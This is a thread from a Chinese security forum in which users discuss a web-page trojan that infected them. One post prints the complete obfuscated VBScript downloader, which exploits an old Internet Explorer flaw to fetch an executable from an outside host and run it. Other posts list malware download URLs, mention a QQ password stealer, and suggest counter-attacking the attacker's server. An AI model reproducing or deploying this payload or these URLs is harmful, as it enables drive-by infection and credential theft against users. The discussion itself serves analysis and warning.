能力值:
( LV9,RANK:170 )
2 楼
怎么才能中木马?浏览网页就ok吗?
我没中,郁闷
利用了ie什么漏洞?
能力值:
(RANK:570 )
3 楼
改出来的吧。。
能力值:
( LV2,RANK:10 )
4 楼
打开就中标了,学艺不精,中了以后才发现。这个文件是病毒体,没做准备不要运行,我重启了一次才删干净。
木马来自:http://www.wuswei.com/i/index.htm
<script language="VBScript">
on error resume next
Set dfile = document.createElement("ob"&QQ67112525ddd&"ject")
dfile.setAttribute "cla"&Q52fg&"ssid", "clsid:B"&fgQ6725fg&"D96C556-"&fQ6ff&"65A3-11"&fg12525&"D0-983A-"&QQ67112525&"00C04F"&QQ67112525&"C29E36"
Set http = dfile.CreateObject("Micro"&QQ67112525&"soft.X"&F4sdTRhh&"MLH"&"TTP","")
a1="Ad"
a2="odb."
a3="Str"
a4="eam"
set strm = dfile.createobject(a1&QQ67112525&a2&F4sdTRhh&a3&a4,"")
strm.type = 1
http.Open "GET", "http://www.wuswei.com/i/admin.exe", False
http.Send
f1="Scri"
f2="pting.Fil"
f3="eSyst"
f4="emObject"
str13=f1&f2&f3&f4
str12=str13
set fso = dfile.createobject(str12,"")
set temp = fso.GetSpecialFolder(2)
filename= fso.BuildPath(temp,"moi.com")
strm.open
strm.write http.responseBody
strm.savetofile filename,2
strm.close
b1="She"
b2="ll."
b3="Applic"
b4="ation"
set exc = dfile.createobject(b1&QQ67112525&b2&F4sdTRhh&b3&b4,"")
str4="open"
exc.ShellExecute filename,"","",str4,0
</script>
上传的附件:
能力值:
( LV7,RANK:100 )
5 楼
看不明白权限是怎么提升的...
能力值:
( LV2,RANK:10 )
6 楼
能力值:
( LV2,RANK:10 )
7 楼
能力值:
( LV13,RANK:970 )
8 楼
偷魔?+QQ的??密瘁。办斤了:
http://www.ads183.com/qq/meizi/ou.asp
另外又下了:
http://www.meizi7472831.com/kanhai/229/1.exe
http://www.meizi7472831.com/kanhai/229/2.exe
http://www.meizi7472831.com/kanhai/229/3.exe
http://www.meizi7472831.com/kanhai/229/4.exe
http://www.meizi7472831.com/kanhai/229/5.exe
http://www.meizi7472831.com/kanhai/229/6.exe
http://www.meizi7472831.com/kanhai/229/7.exe
http://www.meizi7472831.com/kanhai/229/8.exe
http://www.meizi7472831.com/kanhai/229/9.exe
lz把下面呃一堆也一次重起搞定了?
能力值:
( LV12,RANK:290 )
9 楼
NBW再写一个病毒分析~
能力值:
( LV2,RANK:10 )
10 楼
最初由 nbw 发布 偷魔?+QQ的??密瘁。办斤了: http://www.ads183.com/qq/meizi/ou.asp 另外又下了: ........
攻击它把,做个自己发送密码的,发送到他的数据库暴掉为止
能力值:
( LV2,RANK:10 )
11 楼
能力值:
( LV2,RANK:10 )
12 楼
驱网页挂马了:
detected: Trojan program Trojan-Downloader.VBS.Small.av Script: http://bbs.driverdevelop.com/[1]
能力值:
( LV2,RANK:10 )
13 楼
hao!!!!!!!!!!!!!!!
能力值:
( LV13,RANK:970 )
14 楼
能力值:
( LV2,RANK:10 )
15 楼
RUNDLL32,此时会使木马客星退出,但不幸的是注入被报警了,要不我咋知道的.之后我检查了所有新建文件,启动,服务,插件,驱动,才确认没问题的.我在学校的机器经常被中木马,我真是不理解,我的机器上又没啥好东西,QQ是垃圾号,游戏帐号里也没钱,未啥老是中毒哪?值得研究.
能力值:
( LV13,RANK:970 )
16 楼
无耻啊无耻,我远程看了一下,你的确中毒了中毒了r
能力值:
( LV9,RANK:330 )
17 楼
还是卡巴厉害,附件还没下载就查出来了。
卡巴斯基反病毒6.0
The requested URL http://bbs.pediy.com/attachment.php?s=&attachmentid=3343 is infected with Trojan-PSW.Win32.QQPass.pz virus
能力值:
( LV9,RANK:210 )
18 楼
原来是这个东西,之前在百度搜索东西,上一个国内网站就中招了,一大堆东西删除不干净,IE缓存和临时目录中都有,删了一边另一边又来了,最后只好ghost之前的windows
能力值:
( LV2,RANK:10 )
19 楼
nbw确实厉害小弟我好身佩服
能力值:
( LV2,RANK:10 )
20 楼
能力值:
( LV2,RANK:10 )
21 楼
能力值:
( LV2,RANK:10 )
22 楼
为什么都中病毒呢?
这些都是利用系统的漏洞来下载的!
难道各位都不爱打系统补丁嘛
能力值:
( LV2,RANK:10 )
23 楼
那个老漏洞了06014据说效果很好